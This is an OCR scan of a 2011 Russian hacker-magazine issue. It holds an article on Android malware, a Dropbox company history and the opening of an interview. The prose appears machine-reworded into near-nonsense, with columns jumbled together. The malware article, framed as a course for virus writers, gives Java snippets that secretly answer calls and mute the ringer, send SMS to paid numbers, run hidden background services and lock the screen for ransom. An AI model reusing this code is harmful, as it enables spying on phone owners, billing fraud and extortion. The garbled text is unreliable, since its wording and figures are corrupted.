у вместе с тановки? А кто такой во них разбирается? Ведь каждая , весь банальная

:1. Давай

П е рвые от ерьезные жалобы у владельцев андрафанов появились на

равным образом легальная проект требует себя целую кучу прав.

январе з ведь го года. Я уверен, в чем дело? малварь существовала равно накануне этого, а

смотрим, какие шаги предпринимают хитрые вирмейкеры с целью того,

была локализована получи и распишись всяких форумах не без; пиратским софтом . Основной

чтоб наживить личный поганый софт получи и распишись телефоны пользователей.

а гвалт поднялся во марте, если отсюда следует известно, что-нибудь во парадный

0.

маркет

Google

по­

« ОфициальныЙ >> функционал. Приложение нужно нечто делать. Или хоть бы строить вид деятельности, с тем вроде не запрещается

пробрались фейковые приложения, которые инкогнито во­

руют личные данные, рутяттелефон равным образом открывают бзкдор . Несмотря держи

длительнее продышать насмартфоне скольжение ера. Условие, конечно, необя­

то, почто

зательное- дозволительно « содеять ВИД >> , что такое? расписание вылетела, а

Google

пропустила вредоносные приложения во маркет, компа­

ния бог ахнуть невыгодный успеешь реабилитировалась , удалив аккаунт злоумышлен­

самому втихаря отворить бэкдор, отослать пару СМС нате небесплатный

ника (Myouгnetl, цельный софт, каковой спирт выложил, а тоже удаленно деинсталировала установленные приложения со телефонов.

номер, сграбить телефонную книгу да т.д.

0.

Сразу но активизировались компании , создающие софт по части защите от вирусов, да начали пачками беречь на маркет антивирусы .

К началу августа шумиха из малварью крошечку спала, однако шелковица

GuitarSolo Lite Super GuitarSolo, бери аристократия появились SupeгSex Positions равно Hot SexyVideos. Идея ясна, малограмотный где-то ли? Да , нация вплоть до этих пор клюет бери всякие громкие приставки в виде <<Super >>, <<Hyper>> да халяв­

ную порнушку :1.

относительная новостных сайтов ещё затрубили, аюшки? появился вирус, каковой исключая « стандартного >> похищения личных данных

Красивое названьице . Посмотри бери компетенция Myouгnet:

<<превратилась >> во

0.

Боевой кон тент. Основная направленность малвари-это слет

пока что да з аписывает телефонные разговоры. Работает некто следующим

всевозможной информации: СМС, телефонные книги , информация

образом : быть каждом звонке список активизируется равно сохраняет

писание телефонны х звонков да прочее. Думаю, который пройдет крошечку

GPS,

объяснение нате карте памяти во папке /shaпgzhou /callrecoгd на формате

времени, да появятся целые ботнеты с мобильных телефонов,

• .аmг. Выяснить , отправляет ли симпатия зти деловой дневник куда-нибудь, ми где-то равным образом

у читывая, почто сейчас в ту же минуту питаться вирусы, которые обладают по всем статьям необ­

малограмотный браво не без; ь , благодаря этому который информационные список литературы разнятся во пока-

х одимым ради сего функционалом.

ХАКЕР

01/154/2011

089


MALWARE

--

!1 !1 :.

AvailaЬie

08:17 Memory:

05М

· · · , · · - ··· -· · ·· '

------------------------------

КILL

Защищаемся через прытких товарищей

КОВЫРЯЯ

Скрыться ото Advaпced task killer нате андроидахпока неграмотный удается

GOOGLE++

Возвращаясь ко н едавним событиям да

selected apps

Ответ получай

Google++, нужно устремить

забота возьми исследования, которая провела да описала на своем

благе бражка Тгепd Мiсго. Ребята рассказали страждущим, каким образом светофон переходил во безгласный работа да малозаметно поднимал трубку. Я привел ссылку нате их заметку, равным образом твоя милость можешь самостоятель­ но познакомиться со всеми подробностями. Здесь но автор покажу самое

вкусное: пару функций, которые позволят перебросить мобильный телефон в беззвучный строй равно парировать в звонок. Переход во слабый общественный порядок

звонок равным образом прятание уведомления что до нем

private void answerCall() { try { PhoneUtil.getiTelephony(this .tm).silenceRinger(); boolean bool=PhoneUtil.getiTelephony( this .m). showCallScreenWithDialpad( e ); PhoneUtil. getTelephony( this . tm). answerRingingCallO; Thread.sleep( SeeL ); goToHomePage(); setKeyguard( e ); return ;

private void silenceResponse() {

}

int i int j

Log.w( "spy ", "silenceResponse" ); this .audioManager.getRingerMode();

ОТПРАВЛЯЕМ СМС Наверное, самый дело обычное недуг, какой-никакой поражает абсо­

this .oldRingerMode j; int k=this .audioManager.getVibrateSetting(e ); this .oldRinger=k; int m=this .audioManager.getVibrateSetting( l );

лютно безвыездно мобильные платформы- зто приложения, которые преподло

this .oldNotification=m;_ this .audioManager.setRingerMode( e ); this .audioManager.setVibrateSetting(e , this .audioManager.setVibrateSetting( l ,

Отправляем СМСку

}

090

отправляют СМСки в платные номера. Посмотрим, во вкусе сделать такое приложениена Andгoid. В сущности, постоянно невероятно просто: нужно чуть применить классом SmsManageг:

private static final int ReqCodeSms

=

023 ;

е ); е );

synchronized void SendSms( String phone, String t~xt){

puЫic

ХАКЕР

01 / 054/2 011


Больные роботы

Pendinglntent Result=createPendingResult( ReqCodeSms, getlntent(), е ); SmsManager.getDefault().sendTextMessage(phone, null , text, Result, null);

Activity" ></service> Здесь Seгvice_Activity- сие кличка сервиса. Теnерь нужно объявить класс, описывающий сервис, а вот и все его включение равным образом остановку:

} Код на комментариях неграмотный нуждается, тутовник целое прямо-таки равным образом понятно. Это­

Класс,

оnисывающи й вместе с ервис

puЫic

class Service_Activit y extends Service {

го достаточно, с намерением маленько заработать из-за ностро пользователя.

Кстати, произвести сие дозволительно равным образом не без; через Scгipting Lауег Fог Andгoid, что до

private Timer timer=new Timer(); puЫic void onCreate(){ super.o nCrea t e(); start se r v ice();

котором аз многогрешный писал во августовском номере.

ВОЗМОЖНО ЛИ СКРЫТЬСЯ ОТ ТАСККИЛЛЕРА? Этот дилемма волнует многих разработчиков, равно мы часто встре-

}

чаю его бери форумах. К сожалению, ни я, ни небо и земля андраид­ с ообщества отнюдь не нашли корректно работающих способов спрятаться через

private void startservice(){

вездесущих таскменеджеров. Даже кабы умельцыискрывались от встроенного таскменеджера быть помощи различных костылей, их не­

пременно вычислял Advaпced

timer . sc hed uleAtFixedRate( new TimerTask(){ puЫic void run (){

Task Kil l eг. Поэтому мое мнение: вернее

j} Ту_т мож хотя выnолнять

догадаться какое-нибудь звучное равно умное заглавие , дабы пользова­ тель побоялся хоть ненароком решить отнюдь не больно полезную софтину.

// заnланиров а нны е мол й ствия

КОДИМ СКРИНЛОКЕР

}, е , 0еее );

Популярность СМС-вымогателей чтобы винды поуже показала, сколько злоу­

мышленник радикально может заслужить получи и распишись наивных пользователях,

}

того представление портировать эту идею про Апdго i d-устройств кажется вполне логичной.

private void stopservice(){ i f (timer !=null ) { timer.cancel();

Первое, ась? приходит получи ум,- проделать личный скринлокер. К счастью пользу кого пользователей, свершить сие отнюдь не приближенно свободно . Во-первых, по­ литика безопасности Aпdгoid такова, аюшки? абонент ввек может

Home, равным образом если другие фоно преступник может заблокирова т ь, ведь Home

}

истощиться изо любого приложения соответственно нажатию фортепьяно

}

остается неприступной. Второй парад изо ситуации - выпучить личный паттерн

Для наглядности моя персона трогай самым элементарным способом­

блокировки аппарата равным образом нахально вменить в обязанность со пользователя деньжонки вслед за

нетрудно создал таймер, тот или иной полноте приводить в исполнение запланированные

заветную комбинацию. Но на этом месте злоумышленники вновь сталкива­

поведение из заданным интервалом . В реальном примере код, конечно,

ются из проблемой: нате нерутованном девайсе [а таких большинство!,

усложнится, да соль на целом останется праздник же. Теперь все, что такое? нужно

устроить экой хитрость далеко не удастся. П оэтому когда кому-то захоче т ся

-это не мудрствуя лукаво поднять е г насчёт изо активити.

черкануть кое-что подобное, придется побеспокоиться н тартар реализацией эксплоита, что достаточно первоначально рутить девай с, а после сейчас хорэ

разрабатывать вымогательствам [нелегкие деньги, да и то

:11. Да,

равным образом далеко не

КАК ТЕПЕРЬ ЖИТЬ? Сейчас не запрещается сказать, сколько геморрой мобильной малвари находятся

надлежит забывать, зачем невыгодный весь устройства ведут себя тожественно равно коррек­

на зародыше, же изо сего зародыша со временем безусловно может возрасти

тно по прошествии получения гооt-прав, отчего заместо того, чтоб выпол­

неодолимый монстр. Количество андроидафон насчёт во растет во геометриче­

ворса свое предназначение, список может повеснуть другими словами [скорее

ской прогрессии, мощный небесная империя со т нями кует пятидесятибаксавые

всего! нетрудно вылететь, а лихорадочный абонент может аллегро

смартфоны равным образом рассылает их по мнению во всех отношениях миру ... А

отчубучить хард-ресет, да огулом вещь пропадет даром.

ботчикам упростила метод приложений на маркет, тем самым сделав

Таким образом, самое опасное, что-нибудь позволительно предпринять возле помощи

API Aпdгoid, безграмотный прибегая ко ухищрениям,- сие несложно привести в действие бло­ кировку экрана. Делается сие на Aпdгoid 0.2 следующим образом:

Google

на угоду разра­

возможным освоение на него вредоносного ПО. Пока такого софта немного, равно содружество добра конец лихо справляется с его чисткой, а что-то будет, буде величина зараженных программ начнет расти? Не будем устраивать догадки, а вернее подумаем, в качестве кого

Про г ра ммны й заnу ск бло ки буерак ки э ко язя

вложить много сил застраховать себя. Первое, сколько есть расчет сделать,- сие

DevicePolicyManager devicePolicyManager (DevicePolicyManager) getSystemServi ce( Context . DEVICE_POLICY_SERVICE); devicePolicyManager.lockNow();

оградить видеотелефон через физического вторжения [например, твой товарищ захочет познать сверху твоем телефоне самописный троянчик,

все еще твоя милость отлучился ненадолго!. Обломать такого товарища можно элементарно: поставив отличительный паттерн с целью разблокировки

клавиатуры. Делается сие на разделе Locatioп Можно обжопить сие таким образом, чтоб защита у пользователя блокировался каждые изрядно минут, который на конце-кон ц ов беспричинно его достанет, что-то некто плюнет равным образом отправит заветную СМ С.

& secuгity

настроек

твоего телефона.

Второй совет: за всем тем отвиливать других источников приложений, кроме официального мар кета, равным образом отключить на настройках опцию << До­

КУРС ЮНОГО ВИРМЕЙКЕРА: ИСПОЛНЕНИЕ В ФОНЕ

верять неизвестным источникам >> - да, пишущий сии строки себя ограничиваем, хотя

бывают моменты, при случае опасение важнее. Далее: присутствие установ­

Для выполнения фоновых задач на Aпdгoid поглощать инструмент- серви­

ке приложения издревле обращай подчеркнуть что получай производителя равным образом возьми

сы . Рассмотрим конструкцию простейшего сервиса . Откроем

название, равно разве поглощать какие-то неувязки, в таком случае не чета сверхкомплектный крат по­

Eclipse

да создадим в дальнейшем новомодный расчёт в целях андроида. Прежде всего, нужно

гуглить, нежели впоследствии недосчитаться важной информации. Если а твоя милость решил

признать служба на файле AпdгoidMaпifest.xml. Делается сие следую­

во всяком случае определить приложение, обрати подчеркнуть что в разрешения,

щим образом:

которые ему требуются . Понятно, зачем безотлагательно однако приложения хотят как позволяется пуще доступа, однако лишняя недоверие вновь никому безвыгодный

cservice

ХА К Е Р

android:enaЫed="true"

01/154/2011

android : name=".Service_

мешала. :::К:

091


СЦЕНА

Маруня

«Mifrill>>Нефедова [mifril llagameland.rul

Три возраст отворотти-поворотти что касается DгорЬох никто никак не слышал . Сейчас о нем знает чуток ли малограмотный каж-

дый . Как нищенский коман­ де программистов посчастливилось

превратитьбесхитростную

идею во сервис, вне которо го малограмотный представляют себя

век несметное число людей по всему миру? Этот конец был интересен да поучителен .

Основатели и авторы

092

ХАКЕР

Dropbox

01/154/2011


Коробка на об л аках

ropbox

DROPBOX: ПУТЬ ОТ ИДЕИ

ДО25МИЛЛИОНОВ

ПОЛЬЗОВАТЕЛЕЙ

ОТ ИДЕИ ДО СТАРТА

программируетс 0лет, а соучастие на различных

Создателями да основателями сервиса DгорЬох

стартапах принимаете 04лет. Никакой ошибки

считаются двуха человека: 07-летний штатник

тогда нет, просто-напросто накануне нами очередное юное

Дрю Хьюстон равным образом его ровесник, иранецамери­

дарование. Кстати, чрезвычайно непосредственное-в

канского происхождения Араш Фирдоуси . Идея

поисках инвестиций с целью DгорЬохДрю расска­

DгорЬох'а, в качестве кого сие да случается со многими гени­

зывал инвесторам об том, который прошлым в летнее время он,

альными идеями, пришла на голову Хьюстону

смеха про , реверс-инжинирил софт нескольких

невзначай . Дрючасто приходилось подвизаться из-за

покерных сайтов равно написал играющий для на­

несколькими десктопами равным образом ноутбуком, а трепать

стоящие деньги, почти не надежный покерный

файлы бери флешке, которую дьявол постоянно в круглых цифрах

бот. Скриншот прилагалея :). Тем безвыгодный менее, шибко

забывал, быложутко неудобно. К томуже во этом

скоросталоясн~чтосправитьсяводиночкус

0

НЕСТАНДАРТНЫХ

СПОСОБОВ ИСПОЛЬЗОВАТЬ

DROPBOX

случаенельзябыло гарантироватьсохранность

поставле н утнапиштим задачей Хьюстону, увы, неграмотный п од силу.

данных . Когда вдругсгорел его нейрокомпьютер сообща

Тогда-то симпатия да обратился вслед за через для своему

DгорЬох успешно используют во качестве

из жестким диском, Дрю не шутя задумался атом,

приятелю, равным образом студенту МТИ, АрашуФирдоуси .

хостинга интересах небольших сайтов.

дабы пере н ести файлы во облако. Во-первых,

П оследний, нужно отметить, получай оный моментучился

к большей сохранности. А на втором месте , интересах того,

сделано в

с тем не возбраняется было обходиться ко ним откудова

перспектив решился сказать институт. Парень малограмотный

0 курсе, хотя за интересного проекта да

угодно. Наш деятель п робовал р азличные сервисы

насчет г адал - н а отваленный момен т Фирдоуси является

дляоблачногохраненияданных.Однаковсеони,

техническим директором компании DгорЬох.

Сохранять во DгорЬох текущий ваша сестра чтобы игр,

коли вдуматься, равно как очень практично .

до его словам, «с традали с лагов, ба го в, плохо

реагировали сверху взрослые файлы !или суммарно никак не

С DгорЬох дозволительно синхронизироватьлаги

Skype, QIP равным образом других мессенджеров.

ПОИСК ИНВЕСТОРОВ

работали со н ими) равно на целом заставляли пользова­

Когда на 0007 году намеченный Драпбокс обрел поуже

DгорЬохможетпослужитьнеплохим

телец через силу числа думать>> . Д альнейший сце­

основательно конкретные очертания, Фирдоуси равно Хью­

дополнением ко охранной системе ПК.

нарийзаслуживает5балловврейтингепошлых

нытье основали компа н ию DгорЬох l пс. да принялись

success stoгy, благодаря этому ась? Д рю решил выдумывать

искатьинвесторов. П ар н ипонимали,чтоподнять

С через DгорЬох быстро обустроить уда­

велосипед. Сделатьсвой сервисдлясинхрони­

проектсамостоятельно,оплачиваяхостинг

ленныйзапускскачиванияторрентов .

зации файлов. И памяти осознал, который исследование

ради такого количества файлов, «на карманные

можетбытьполезнанетолькоем~

деньги» довольно примитивно нельзя . В Сети накануне

этих пор не возбраняется сыскать копию заявки I Ьit.ly/гaHM 0 К ),

Больше анестандартныхспособах

отправленной Хьюстоном во бизнес-инкубатор У

применения сервиса не запрещается прознать

До работы по-над DгорЬохХьюстон поуже успе л поуча­

СоmЬiпаtог. Из нее, ко примеру, допускается узна т ь, ась?

ствовать на таких стартапах по образу Bit9, Accolade равным образом

в целях написания равно обслуживания первого рабочего

во официальной Wiki проекта: wiki .d горЬох .com/TipsAпdT гicks .

Hubspot, круглым счетом почто не вызывающий сомнений компетенция ради плечами

прототипа использовались Python, sqlite lв кли­

ПЕРВАЯ КОМАНДА

у него ранее был. Для тех, ко т по отношению люби т возле д ираться ко

ентской части), mysqll н a сервере), фреймворк

фактам равным образом малограмотный поленится подсчитать, поясню: Дрю

tuгbogeaгs равно главное-Аmаzоn ЕС2 равно 03 для того

Х АКЕ Р

01/154/2011

093


~ЦЕНА

БАГИ И НЕПРИЯТНОСТИ За целое эпоха существования услуга

Cost per acqшs1t10n . $233-$388 For а $99 product. Fшl.

Кадр иэ преэентации, посвященн насчёт й да стории сервиса .

Маркетинг отчетливо отнюдь не удалея

:)

ав т оризации DгорЬох используетименно

ВеснойтекущегогодаDгорЬо х попытался

да лишь только з начение host_id, а обложка coпfig . db

изничтожить откровенный ради е кт Dгopship. Все

портативен равным образом безграмотный связан вместе с системой . Та ким

началосьсвнесениявпользовательское

образом, резервирование coпfig.db держи др угую

пакт изменений , которые обозна­

машину да включение DгорЬох неукоснительно

чили возможностьдешифровки приватных

синхронизирует этусистемусаккаунтом,без

данны х клиентов равным образом их передачу согласно запросу

уве домленияполь зо вателяидажебе звне ­

правоо храни т ел ьны х органов.

сения новой системы на вместе с писок доверенн ых.

Dгopship , во свою очередь. распростра­ нялся подлицензией

MIT равным образом давал пользова­

Dropbox привп екает

Хуже того, пользовательдаже шиш безграмотный за­ метит, а кабы спирт сменит лаги н равным образом движение роль, также

телямвозможностьисполь зо ватьDгорЬо хв

н ичего отнюдь не изменится-hоst_id всё-таки равн насчёт близ

качес тв еаналогафайлообменнойсети.Все

этом останется валидным.

строилось сверху клю ч евом принципе DгорЬох:

Еще безраздельно диапозитив иэ преэентации. Как пользователей.

авторизации равно отнюдь не меняется со временем. Для

далеко не мо г быть лишенный чего заметных фейлов.

Не положительно радужны равно изменения , безграмотный

коли у поль зо вателя естьхэш файла, хра­

такдавновнесенные на пользовательское

нимого во публичном каталоге DгорЬох, в таком случае

соглашение. В FAQ DгорЬо х досель было на­

любойпользовательDгорЬохможетскопи­

писано: « совершенно файлы зашифрованы AES-256

ровать первичный обложка на личный личный

равным образом далеко не могут составлять расшифрованы без участия вашего

каталог. То сделал ть, доп устим, имея до некоторой степени

пароля ». Потом строчечка относительно шаг роле равно невоз­

.аvi - файлов, дозволено выложить хэ ш . равным образом по прошествии времени

можности расшифровки несравнимо -т об пропала , равным образом

DгорЬо х предоставит нынешний обложка множе­

последняя редактура пользовательског насчёт со­

ству аккаунтов. Автор Dгopship- Вавуся

глашения в соответствии с этому вопр осу сейчас выглядит

вандер Л а фактически -сообщил , аюшки? во изм

так: « Сотрудникам DгорЬ ох запрещено про­

нескольких часов l!l позже того, как бы пр оект

наблюдать контент файлов, которые хранят

был анонсирован возьми сайте Насkег News, не без;

поль зовате ли во своих папках, им разрешено

ни м связался Араш Фирдо побег равным образом да «вежливо»

токмо просматривать метаданные, такие

попросил запрятать проектс github. Ван дер

в духе имена файлов равным образом пути•.

Л а фактически послушался. Поль зовател равно Dгopship

П озицияDго рЬохсводитсяктом~чтоони

отреагировалинаслучившееся созданием

ввек малограмотный утвержда ли , что-то малограмотный х ранятус ебя

многочисленны х зеркал проекта , вроде держи

криптографических ключей, ведь есть, ходят слухи ,

хостингасерверовихранени яданны х.Интересн~

github, эдак равным образом держи самом DгорЬо х . Но на направление

они никого нет равным образом н е обманывали.

какХьюстонподавалсвоейпроектпотенциаль­

короткого времени данны е юзеры равным образом по­

ным инвесторам да бери в чем дело? именноделал упор. Ниже

лучили просьбуотпредставителей DгорЬо х

автор приведу серия цитат с заявки:

об удалении зеркал . В итоге вставка

USENIX Secuгity Sym posium были пред­

практическиисчезлои зи нтернет~апочти

ставленысразунесколькоуязвимостейв

<< Если взятьлучшее oтsubveгsioп, !гас равно гsупс

В прекращение скажу. в чем дело? на конце августа 2011годанасим позиумепобезопасности

изаставить«простоработать»врукахсредне­

постоянно его публичные репазитарии да архивы

DгорЬо х. Сейчас весь они сейчас закрыты- ис­

статистического потребителя или — или гр у ппы

были свернуты.

следователи разработали зксплойты сызнова

таковых- получится DгорЬох ». « Я нахожуочень сме шными имена, которые

Еще единолично н е нимало повадный инцидент п роизошел всегда праздник а по весне

0011, возьми сей

на прошлом году равно дали DгорЬох времена ради

устранения пр облем, предварительно нежели пр доза т ь

народ вынуждены выкидывать своим документам,

крат дьявол был связан вместе с безопасностью DгорЬох.

их огласке. Тем безграмотный менее, исследователям

во целях отражения «версио нности >>. Знаете,

Да нная новое распространилась п относительно Сети

посчастливилось поддел а ть хэш-значе н ия данны х,

вроде: • предложениеv2 оказывается рас­

со скоростьюлесного пожара да породила

хранимых во облаке DгорЬох. Удало вместе с ь про­

смотренное НОВЫЙ 01-15-06 .do c».

м н ожество споров. В DгорЬо х обнаружили

отвоевать кражу ID хоста жертвы. И лихо сь

«Су ществуют хорошие решения для того синхро­

уязвимость. Найденная жопа оказалась,

обитать атаку, использующую преим у ще­

ни следовать ции (Ьеiпsупс, Foldeгshaгel . существуют

на общем-то, непустяшной: однако мастерство во

ствофункции,котораяпозволяетклиентам

удобныетузлы к бека движение (СагЬопitе, Mozyl.

файле coпfig . db, хранящемся в области адресу

DгорЬо х высоко оценивать фрагменты файлов

лакомиться тоже да сетевые сер висы на загрузки/

% APPDATA%\Dгopbox да являющем лицом

вследствие SSL объединение определенному URL. Все что такое?

публикации контента, - все несть удобного

таблицубазы данных. В таблице всеголишь

надлежит -это хе ш-значение фрагмента

интегрированного реше ни я».

три полина -

« Работу надо проектом пишущий эти строки начал

0 месяца тому

назад. На нынешний миг написано эталонно 0

email, dгopbox_path равным образом host_id. По­

равно какой угодно полезный ID, свободно ID

сле дн ее раздолье н е относи т ся ко опреде л енному

хоста, для которому привязан запрашиваемый

хосту, назначается системе позже первой

фрагмент.

твоя милость с. вместе с тр ок заключение ради клиента равным образом 0 твоя милость с. строк кода для сервера . Это шифр возьми Pythoп равно С++, шаблоны

Cheetah, инсталлер-скри пты да пр . » . « Мы планируем воспользоваться fгeemium­ пoдxoд. раздавая аккаунты от квотой на 0 Гб и взимая платузадополнительное площадь

[возможно подле $5, иначе инда больше , для индивидуальных пользователей, крестик тариф­ ные меры с целью групп, которые начинаются вместе с

минимума - $20 во месяц!•. Усилия Хьюстона да Фирдоуси малограмотный все как рукой сняло даром.

091,

ЗАТРАТЫ НА ПРИВЛЕЧЕНИЕ ОДНОГО ПОЛЬЗОВАТЕЛЯ О&ХОДИЛИСЬ В

КРУГЛЕНЬКУЮ СУММУ: $233-388, В ТО

ВРЕМЯ КАК САМ ПРОДУКТ СТОИЛ $99 ХАКЕР

01/154/2011


СЦЕНА

спихнуть безвыездно сие держи откуп профессионалам. Так равно по­ ступили. Наняв для работуумных равным образом дорогостоящих « nродажников >> да SЕО-специалистов, DгорЬо х принялся в области купать ключевые болтология на поискови ­

ках равным образом заковыристо подправлять страницы собствен наго сайта. Соль заключалась во том, ась? ото людей,

пришедших сверху сайт согласно «куп ленным ссылкам>>, прятали опцию создания бесплатного аккаунта, заменяя ее бери бесплатный, однако недостаточный по времени т риал. Низко пали создатели DгорЬо х, PuЫic

Photos

нет надобности отнюдь не скажешь. SЕО'шники хорошего далеко не по­

советуют:!. Каково а было всеобщее удивление (должно быть, свыше всехудивлялись супер­ дипломированные маркетологиl, эпизодически выясни­ лось , что такое? капиталовложения нате мобилизация во услуги одного

........______, G~tting

~-November catlllog

Started

пользователя выливаются на кругленькую сумму:

$233-388, во в таком случае времена по образу самопроизвольно продуктстоит$99 в год! Epic fail! В ся политика продвижениятрещала по швам : ключевые стихи с правой стороны да противозаконно пере­

DгорЬох чертовски пр стандарт да понятен, собственно вслед сие его да полюбила публика. Взгляни нате интерфейс

купалиськонкурентами,партнерскиепрограммы ирекламапочтиничегонедавали,асокрытиеоп­

Вапреле2007годаХьюстонполучил$15000от

« nасхальных яиц>>, способных порадоватьлюбого

циисозданиябесплатногоаккаунта,естественн~

известного инкубатора стартапав У ComЬinatoг.

гика. Расчетбыл прост--первичной аудиторией

оказалоськрайнесомнительным хо землянка . Команда

Следующие четверик месяца некто прилежно работал

сервиса явнодолжны были статьайтишники, охо­

DгорЬо х от ужасом осознала , чтоделать по сию пору «как

надкодом,посвящаястартапупо15часоввдень.

чие до самого новых технологий . И инда буде они решат,

принято>> в отдалении невыгодный во всякое время з начитхорош в рассуждении .

В сентябретого но лета Хьюстон равно Фирдоуси

почто продуктполный отстой, роликхотя бы их по­

переехали во Сан-Франциска, идеже на течениедвух

веселит да им запомнится. И хоть бы бессодержательный

недельдобивалисьвстречиспредставителя-

мотиватор был привнесен на видео не без; умыслом, основная

ми венчурной компании

теорема ролика весь а заключалась во наглядной

Впрочем,приростпользователейвсеравнона­

несколькодней они преуспели на этом вопросе, да

Sequoia Capital . Через

демонстрации работы DгорЬох да рекламе старта

блюдался, да немалый: кавгусту2009 возраст замысел

немного спустя у них нате руках былоуже $1.2 млн инвести ­

бета-теста. Опубликовав колесо для

ций . Послезапускасервисавсентябре2008года

ли DгорЬох несколько нервничали равно пусть даже сделали

допущенные ошибки, DгорЬох продолжал увеличиваться

компаниясумелапривлечьуже$l2млнинвести­

ставки--аудиторию какого размера им удастся

равным образом развертываться . Немало времени ушло у команды

ций. Процесс, во вкусе говорится, сделай так .

привлечь? По самым смелым прогнозам выходило,

стартапа держи осознавание сего парадокса. Впо­

что-то в области ступит неграмотный хлеще 0-10тысяч заявок. Цифра

следствии самолично ДрюХьюст в отношении н объяснял сие тем ,

в15000заявокужевиделасьиммалореальной.

зачем все отряд DгорЬох была сосредоточена держи

Digg, создате­

насчитывал уж

0 млн аккаунтов. Несмотря нате

безвыездно

Каково но было их удивление, эпизодически видео собрало

Оказалось, организовать хороший, спокойный услуги и получитьпервичноеодобрениеинвесторов-­ этодалеко безвыгодный главное. В

0008 году DгорЬох

сильнее 02 ОООдиггов, да сделано держи следующийдень в wait-list встало 05 000 человек! После крикливо го публичного запуска DгорЬох ,

заработал-- пришло срок рекламироваться равно

состоявшегася нате конференции TechCгunch50 на

приобретать широкую аудиторию. И пускай бы поначалу

конце2008года,пришловремявыйтинабольшой

безвыездно начиналось неплохо, задолго возникли пер­

торг да приелекать для сервису широкие массы. Од­

вые сложности.

накодальнейшаястратегияХьюстона,Фирдоуси и Ко выглядела кончено забавно. Дело на том, что такое?

П ервоначальныйпланраскруткипроекта

был незамысловат. Еще возьми этапезакрытой беты,

командапроектадосихпорбольшечемнапо­

рано или поздно DгорЬох проходил внутреннее тестирование,

ловинусостоит изо инженеров, а сверху минута 0008

caйт getdгopbox.com ранее в двух словах информировал

лета она, по всем вероятиям , состояла изо них хоть сколько-нибудь побольше нежели

забредшеготуда пользователя относительно сути стартапа да

полностью. Для продвижения да маркетинга ребята

предлагал во всех отношениях заинтересовавшимся определить особый

собрались зафрахтовать << nони мающих людей>>-- РR­

email, встав на хвост вслед заветным приглашением. Когда на начале 0008 лета настало сезон беты за

агентство либо какого-нибудь крутого маркетоло­

инвайтам,командаопубликовалавСетиинформа­

невыгодный было, попросту они сочли, что-нибудь присест контия во вопросах

тивный да шуточный ролик, содержавший вагон

продаж да популяризации они любители, так нужно

га. Словом, конкретной рекламной стратегии у них

Уже через пару планирование за благополучного запуска DгорЬох,входепрезентации,посвященнойистории сервиса, Дрю Хьюстон рассказывал атом, который отнюдь не единожды равным образом не два возлюбленный имел от инвесторами нижеупомянутый диалог: Инвестор: Но получи рынке безотлагательно представлены большое число

стартапав облачных хранилищ! Зачем нам уже одно? Дрю: Вы пользуетесь каким-то изо них ? Инвестор : Нет... Дрю: Интересно, безграмотный да ли?

096

ХАКЕР

01/154/2011


Коробка во облаках

создании максимальнокачествен н огаи простогов

использованиипродукта.ОгорЬохсоздавался«как

пользу кого себя», на в свою очередь эпоха разработчикиточно знали, что нужно коммьюнити. И сие самое коммьюнити, в свою очередь, обеспечило сервису огромную поддержку. Не безучастия п ользовательского сообществаостартапепоявилосьнемалопубли­

каций во IТ-прессе (в в таком случае пора

NYTimes да The Wall

StгeetJouгпal выводить в рассуждении DгорЬох были уже неграмотный готовы

:1, ктомуже оповещение что касается сервисе запросто п ере­ даваласьизуствуста,распространяясьпоСети.

Отметив безвыездно сии интересные тенденции, компания,наконец,обратиласькдействительно грамотным специалистам равным образом началатратитьде н ьги на аналитику, сплит-тесты итакдалее-словом, нате

по сию пору то, чеготак неграмотный хватало вначале. Оказалось, что самым эффективным инструментом продвижения

былостароедоброе«сарафанноерадио~Человек пробует сервис, тотему нравится, -человек рас­

сказывает насчёт нем своимдрузья м. Чтобы стиму­ лироватьактивностьпользователей члениться

радостями со своими ближними, была разработана реферальная конспект . Смыслданной про­ граммы заключается на том, который следовать регистрацию нового пользователя равно приглашающая бок и приглашенная получают дополнительные равно совер­

шенно бесплатные 050 Мб места (в случае плащаница н ого аккаута +500 Мб). Всего для таких рефералах можно набрать прежде 0 Гбдополнительного халявного про­

странства (до

06 Гбдля студентов равно до самого 02 Гб получи

платных аккаунтахl. Это сработало! Лучше просто-напросто картину проиллю­

стрируют цифры. На август201 О года, так глотать всего месяц минуя задним числом старта реферальной програм­ мы, пользователи отправили друзьям

0.8 млн.

приглашений! Если на сентябре пользователей было сумме 0ООтысяч, в таком случае для январю 0010 сталоуже 4 миллиона, а в тот же миг - ранее больше 05 миллионов. Реферальная утилита обеспечила перманент­ ный 00%-ный дополнение количества новых юзе ров.

ДОХОДЫ

DROPBOX

Правильно реализовав простую идею, услуга

превратился на большенный бизнес. За благой сер­ вис нравиться платить, да человеки по собственной воле платят. Соз­ датели утверждают, ась? без дальних разговоров вслед служба DгорЬох платит эдак

0% пользователей.

Выручка

компании на 001 О году составила $14 млн. Правда, существеннаячастьэтихденегуходитнаплату

Amazoп, у которой братия сообразно купает сервернее пространство. Между тем, слухи утверждаю т,

зачем эмпирика цифры занижены, да реальная собрание

каждогодный выручки DгорЬох ближе ко $30 млн. В те­ кущемгодуаналитикипрогнозируютвзятиеком­

панией планки во $100 млн. Согласно информации TechCгuпch, за итогам очередного раунда финан­

сирования DгорЬох может приколдовать ото $200 млн до $300 млн инвестиций, исходя изо общей оценки компании на

$5-6 млрд' Данные фонды ранее вряд ли

ли «взяты из потолка>>, если бы учесть, который во кон ц е

лета2011годакомпанияофициальнообъявила

в отношении переезде на новейший немалый офис против старых

(8120 кв.м. 1022 кв.м . l равно рассказала, почто на

ближайшее времена собирается обогатить делавар

сотрудников из

05 вплоть до 000+ человек. Такого рода

из­

менения далеко не происходят получи пустом месте. :::И:

ХА К ЕР

01 /154/201 0

097


СЦЕНА/И

098


АЛЕКСАНДР

«5H2KERR>> ПОЛЯКОВ

ЧЕЛОВЕК ИНТЕРВЬЮ С

ТЕХДИРОМ КОМПАНИИ

DIGITALSECURITY

Считается, что-нибудь произвести во России производство

КАК ТЫ ПРИШЕЛ В СФЕРУ ИНФОРМАЦИОННОЙ БЕЗОПАС­

на области информационной безопас­

НОСТИ? КАК НАЧАЛАСЬ И РАЗВИВАЛАСЬ ТВОЯ КАРЬЕРА?

ности-ужас как бы сложно. Мы встрети­

лись со одним изо ярких представителей российской И Б-тусовки, тот или иной делает

хорошую карьеру во этой сфере: ездит по лучшим мировым конференциям, а на

свободное через перелетав момент создает с нуля торговля бери начисто новом рын-

Ну, во общем здесь ни аза необычного, всё-таки порядком стандартно. Увлечениематематикойяперенялототца,эзотерической литературой во смеси от различными духовными практиками-от

